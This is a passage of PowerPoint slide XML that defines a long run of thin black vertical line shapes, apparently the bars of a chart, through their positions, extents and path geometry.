              <a:path w="635" h="358139">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="358026"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="object 247"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4024822" y="4967876"/>
            <a:ext cx="0" cy="723550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="365125">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="364516"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="object 248"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4024549" y="4969505"/>
            <a:ext cx="2517" cy="721034"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="363855">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="363693"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="object 249"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4052728" y="4801640"/>
            <a:ext cx="0" cy="889652"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="448944">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="448403"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="object 250"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051071" y="4800546"/>
            <a:ext cx="2517" cy="889652"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="448944">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="448955"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="object 251"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080636" y="4820954"/>
            <a:ext cx="0" cy="869517"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="438785">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="438656"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="object 252"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080363" y="4820954"/>
            <a:ext cx="1258" cy="869517"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="438785">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="438656"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="object 253"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4108488" y="4712107"/>
            <a:ext cx="0" cy="978995"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="494030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="493578"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="object 254"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4105747" y="4712911"/>
            <a:ext cx="2517" cy="977737"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="493394">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="493178"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="object 255"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4136393" y="4741064"/>
            <a:ext cx="0" cy="950053"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="479425">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="478971"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="object 256"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4135822" y="4743490"/>
            <a:ext cx="1258" cy="947537"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="478155">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="477748"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="object 257"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4163752" y="4659029"/>
            <a:ext cx="0" cy="1031846"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="520700">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="520363"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="object 258"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4163480" y="4659534"/>
            <a:ext cx="2517" cy="1031846"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="520700">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="520114"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="object 259"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191606" y="4663310"/>
            <a:ext cx="0" cy="1028071"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="518794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="518209"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="object 260"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4190250" y="4661625"/>
            <a:ext cx="1258" cy="1029329"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="519430">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="519058"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="object 261"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4219512" y="4600044"/>
            <a:ext cx="0" cy="1090988"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="550544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="550129"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="object 262"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4219239" y="4603271"/>
            <a:ext cx="1258" cy="1087213"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="548639">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="548506"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="object 263"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4247364" y="4597866"/>
            <a:ext cx="0" cy="1093505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="551814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="551233"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="object 264"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4244914" y="4596772"/>
            <a:ext cx="2517" cy="1093505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="551814">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="551785"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="object 265"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4275271" y="4503519"/>
            <a:ext cx="0" cy="1187881"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="599439">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="598838"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="object 266"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4274998" y="4501299"/>
            <a:ext cx="0" cy="1189139"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="600075">
                <a:moveTo>
                  <a:pt x="0" y="599688"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="599964"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="object 267"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4303177" y="4504570"/>
            <a:ext cx="0" cy="1186623"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="598805">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="598313"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="object 268"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4302903" y="4507295"/>
            <a:ext cx="2517" cy="1184106"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="597535">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="596938"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="object 269"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4331029" y="4374818"/>
            <a:ext cx="0" cy="1316233"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="664210">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="663783"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="object 270"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4329675" y="4372599"/>
            <a:ext cx="1258" cy="1318749"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="665480">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="664909"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="object 271"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4358935" y="4367280"/>
            <a:ext cx="0" cy="1323783"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="668019">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="667593"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="object 272"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4358663" y="4368910"/>
            <a:ext cx="1258" cy="1322524"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="667385">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="666771"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="object 273"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4386789" y="4169964"/>
            <a:ext cx="0" cy="1521343"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="767714">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="767165"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
